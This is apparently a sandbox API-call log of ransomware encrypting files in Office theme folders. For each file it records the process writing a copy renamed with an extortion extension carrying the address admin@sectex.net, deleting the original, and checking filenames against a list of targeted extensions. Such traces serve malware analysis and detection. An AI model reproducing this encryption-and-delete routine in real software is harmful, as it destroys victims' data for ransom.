	[0045.219] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\thmbnail.png")) returned 0x20
	[0045.219] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0045.219] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220
	[0045.219] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.219] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.219] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224
	[0045.219] GetLastError () returned 0x0
	[0045.219] ReadFile (in: hFile=0x220, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x54f1, lpOverlapped=0x0) returned 1
	[0045.332] WriteFile (in: hFile=0x224, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x5500, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x5500, lpOverlapped=0x0) returned 1
	[0045.333] ReadFile (in: hFile=0x220, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0045.333] WriteFile (in: hFile=0x224, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0045.333] SetEndOfFile (hFile=0x224) returned 1
	[0045.333] CloseHandle (hObject=0x224) returned 1
	[0045.334] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.334] SetEndOfFile (hFile=0x220) returned 1
	[0045.335] CloseHandle (hObject=0x220) returned 1
	[0045.335] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0045.335] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\thmbnail.png")) returned 1
	[0045.335] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74
	[0045.335] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74
	[0045.335] lstrlenW (lpString=".doc") returned 4
	[0045.335] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0045.335] lstrlenW (lpString=".docx") returned 5
	[0045.335] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0045.335] lstrlenW (lpString=".pdf") returned 4
	[0045.335] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0045.335] lstrlenW (lpString=".xls") returned 4
	[0045.335] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0045.335] lstrlenW (lpString=".xlsx") returned 5
	[0045.335] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0045.335] lstrlenW (lpString=".ppt") returned 4
	[0045.335] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0045.335] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74
	[0045.335] lstrlenW (lpString=".zip") returned 4
	[0045.335] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0045.336] lstrlenW (lpString=".rar") returned 4
	[0045.336] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0045.336] lstrlenW (lpString=".bz2") returned 4
	[0045.336] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0045.336] lstrlenW (lpString=".7z") returned 3
	[0045.336] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0045.336] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74
	[0045.336] lstrlenW (lpString=".dbf") returned 4
	[0045.336] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0045.336] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74
	[0045.336] lstrlenW (lpString=".1cd") returned 4
	[0045.336] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0045.336] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74
	[0045.336] lstrlenW (lpString=".jpg") returned 4
	[0045.336] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0045.336] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74
	[0045.336] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74
	[0045.336] lstrlenW (lpString=".doc") returned 4
	[0045.336] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0045.336] lstrlenW (lpString=".docx") returned 5
	[0045.336] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0045.336] lstrlenW (lpString=".pdf") returned 4
	[0045.336] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0045.336] lstrlenW (lpString=".xls") returned 4
	[0045.336] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0045.336] lstrlenW (lpString=".xlsx") returned 5
	[0045.336] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0045.336] lstrlenW (lpString=".ppt") returned 4
	[0045.336] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0045.336] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74
	[0045.336] lstrlenW (lpString=".zip") returned 4
	[0045.336] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0045.336] lstrlenW (lpString=".rar") returned 4
	[0045.336] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0045.337] lstrlenW (lpString=".bz2") returned 4
	[0045.337] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0045.337] lstrlenW (lpString=".7z") returned 3
	[0045.337] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0045.337] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74
	[0045.337] lstrlenW (lpString=".dbf") returned 4
	[0045.337] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0045.337] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74
	[0045.337] lstrlenW (lpString=".1cd") returned 4
	[0045.337] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0045.337] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74
	[0045.337] lstrlenW (lpString=".jpg") returned 4
	[0045.337] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0045.337] lstrcmpiW (lpString1=".PNG", lpString2=".bot") returned 1
	[0045.337] lstrlenW (lpString="THMBNAIL.PNG") returned 12
	[0045.337] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220
	[0045.337] GetFileSizeEx (in: hFile=0x220, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=53115) returned 1
	[0045.338] CloseHandle (hObject=0x220) returned 1
	[0045.338] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\thmbnail.png")) returned 0x20
	[0045.338] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0045.338] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220
	[0045.338] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.338] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.338] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224
	[0045.338] GetLastError () returned 0x0
	[0045.338] ReadFile (in: hFile=0x220, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0xcf7b, lpOverlapped=0x0) returned 1
	[0045.595] WriteFile (in: hFile=0x224, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xcf80, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xcf80, lpOverlapped=0x0) returned 1
	[0045.599] ReadFile (in: hFile=0x220, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0045.599] WriteFile (in: hFile=0x224, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0045.599] SetEndOfFile (hFile=0x224) returned 1
	[0045.599] CloseHandle (hObject=0x224) returned 1
	[0045.599] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.599] SetEndOfFile (hFile=0x220) returned 1
	[0045.600] CloseHandle (hObject=0x220) returned 1
	[0045.600] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0045.601] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\thmbnail.png")) returned 1
	[0045.601] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77
	[0045.601] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77
	[0045.601] lstrlenW (lpString=".doc") returned 4
	[0045.601] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0045.601] lstrlenW (lpString=".docx") returned 5
	[0045.601] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0045.601] lstrlenW (lpString=".pdf") returned 4
	[0045.601] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0045.601] lstrlenW (lpString=".xls") returned 4
	[0045.601] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0045.601] lstrlenW (lpString=".xlsx") returned 5
	[0045.601] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0045.601] lstrlenW (lpString=".ppt") returned 4
	[0045.601] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0045.601] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77
	[0045.601] lstrlenW (lpString=".zip") returned 4
	[0045.601] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0045.601] lstrlenW (lpString=".rar") returned 4
	[0045.601] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0045.601] lstrlenW (lpString=".bz2") returned 4
	[0045.601] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0045.601] lstrlenW (lpString=".7z") returned 3
	[0045.601] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0045.601] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77
	[0045.601] lstrlenW (lpString=".dbf") returned 4
	[0045.601] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0045.601] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77
	[0045.602] lstrlenW (lpString=".1cd") returned 4
	[0045.602] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0045.602] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77
	[0045.602] lstrlenW (lpString=".jpg") returned 4
	[0045.602] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0045.602] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77
	[0045.602] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77
	[0045.602] lstrlenW (lpString=".doc") returned 4
	[0045.602] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0045.602] lstrlenW (lpString=".docx") returned 5
	[0045.602] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0045.602] lstrlenW (lpString=".pdf") returned 4
	[0045.602] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0045.602] lstrlenW (lpString=".xls") returned 4
	[0045.602] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0045.602] lstrlenW (lpString=".xlsx") returned 5
	[0045.602] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0045.602] lstrlenW (lpString=".ppt") returned 4
	[0045.602] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0045.602] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77
	[0045.602] lstrlenW (lpString=".zip") returned 4
	[0045.602] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0045.602] lstrlenW (lpString=".rar") returned 4
	[0045.602] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0045.602] lstrlenW (lpString=".bz2") returned 4
	[0045.602] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0045.602] lstrlenW (lpString=".7z") returned 3
	[0045.602] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0045.602] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77
	[0045.602] lstrlenW (lpString=".dbf") returned 4
	[0045.602] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0045.602] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77
	[0045.602] lstrlenW (lpString=".1cd") returned 4
	[0045.602] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0045.603] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77
	[0045.603] lstrlenW (lpString=".jpg") returned 4
	[0045.603] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0045.603] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0045.603] lstrlenW (lpString="PREVIEW.GIF") returned 11
	[0045.603] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220
	[0045.603] GetFileSizeEx (in: hFile=0x220, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=4100) returned 1
	[0045.603] CloseHandle (hObject=0x220) returned 1
	[0045.603] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\preview.gif")) returned 0x20
	[0045.603] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\preview.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0045.603] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220
	[0045.604] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.604] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.604] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\preview.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228
	[0046.610] GetLastError () returned 0x0
	[0046.610] ReadFile (in: hFile=0x220, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x1004, lpOverlapped=0x0) returned 1
	[0046.759] WriteFile (in: hFile=0x228, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x1010, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x1010, lpOverlapped=0x0) returned 1
	[0046.761] ReadFile (in: hFile=0x220, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0046.761] WriteFile (in: hFile=0x228, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0046.761] SetEndOfFile (hFile=0x228) returned 1
	[0046.761] CloseHandle (hObject=0x228) returned 1
	[0046.761] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0046.761] SetEndOfFile (hFile=0x220) returned 1
	[0046.762] CloseHandle (hObject=0x220) returned 1
	[0046.762] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0046.762] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\preview.gif")) returned 1
	[0046.762] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75
	[0046.763] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75
	[0046.763] lstrlenW (lpString=".doc") returned 4
	[0046.763] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0046.763] lstrlenW (lpString=".docx") returned 5
	[0046.763] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0046.763] lstrlenW (lpString=".pdf") returned 4
	[0046.763] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0046.763] lstrlenW (lpString=".xls") returned 4
	[0046.763] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0046.763] lstrlenW (lpString=".xlsx") returned 5
	[0046.763] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0046.763] lstrlenW (lpString=".ppt") returned 4
	[0046.763] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0046.763] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75
	[0046.763] lstrlenW (lpString=".zip") returned 4
	[0046.763] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0046.763] lstrlenW (lpString=".rar") returned 4
	[0046.763] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0046.763] lstrlenW (lpString=".bz2") returned 4
	[0046.763] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0046.763] lstrlenW (lpString=".7z") returned 3
	[0046.763] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0046.763] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75
	[0046.763] lstrlenW (lpString=".dbf") returned 4
	[0046.763] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0046.763] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75
	[0046.763] lstrlenW (lpString=".1cd") returned 4
	[0046.763] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0046.763] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75
	[0046.763] lstrlenW (lpString=".jpg") returned 4
	[0046.763] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0046.763] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75
	[0046.763] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75
	[0046.763] lstrlenW (lpString=".doc") returned 4
	[0046.764] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0046.764] lstrlenW (lpString=".docx") returned 5
	[0046.764] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0046.764] lstrlenW (lpString=".pdf") returned 4
	[0046.764] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0046.764] lstrlenW (lpString=".xls") returned 4
	[0046.764] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0046.764] lstrlenW (lpString=".xlsx") returned 5
	[0046.764] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0046.764] lstrlenW (lpString=".ppt") returned 4
	[0046.764] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0046.764] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75
	[0046.764] lstrlenW (lpString=".zip") returned 4
	[0046.764] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0046.764] lstrlenW (lpString=".rar") returned 4
	[0046.764] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0046.764] lstrlenW (lpString=".bz2") returned 4
	[0046.764] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0046.764] lstrlenW (lpString=".7z") returned 3
	[0046.764] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0046.764] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75
	[0046.764] lstrlenW (lpString=".dbf") returned 4
	[0046.764] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0046.764] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75
	[0046.764] lstrlenW (lpString=".1cd") returned 4
	[0046.764] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0046.764] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75
	[0046.764] lstrlenW (lpString=".jpg") returned 4
	[0046.764] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0046.764] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0046.764] lstrlenW (lpString="PREVIEW.GIF") returned 11
